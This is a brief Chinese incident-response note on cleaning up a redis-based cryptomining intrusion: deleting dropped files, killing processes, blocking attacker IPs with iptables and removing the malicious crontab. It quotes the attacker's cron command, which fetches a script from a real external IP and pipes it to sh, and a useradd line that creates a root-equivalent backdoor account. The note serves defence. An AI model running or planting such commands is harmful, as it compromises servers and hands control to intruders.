服务器被挖矿劫持

通过redis用户进入服务器启用定时任务（/bin/sh -c wget -q http://185.198.58.168/img/Circle_AA.png -O - |sh），然后下载并执行脚本

1.

根据脚本删tmp下文件，删除脚本中所有下载的文件

查看定时任务

2.

top

ps -ef |grep redis

kill -9 进程ID

3.封闭对方ip

iptables -A INPUT -s 104.161.63.57 -j DROP

iptables -A OUTPUT -d 104.161.63.57 -j DROP

iptables -A INPUT -s 163.172.226.131 -j DROP

iptables -A OUTPUT -d 163.172.226.131 -j DROP

iptables -A INPUT -s 185.198.58.168 -j DROP

iptables -A OUTPUT -d 185.198.58.168 -j DROP

iptables -A INPUT -s 78.46.91.171 -j DROP

iptables -A OUTPUT -d 78.46.91.171 -j DROP

service iptables save

service iptables restart

关闭防火墙后进程已经起不来了 ps -ef |grep redis 仍有在建立连接的进程

4.

对方useradd -o -u 0 -g 0 redis  &>/dev/null 禁止了root用户切换redis

usermod -s /bin/bash username

然后 crontab -r  用ps -ef |grep redis查看就没有建立连接的进程了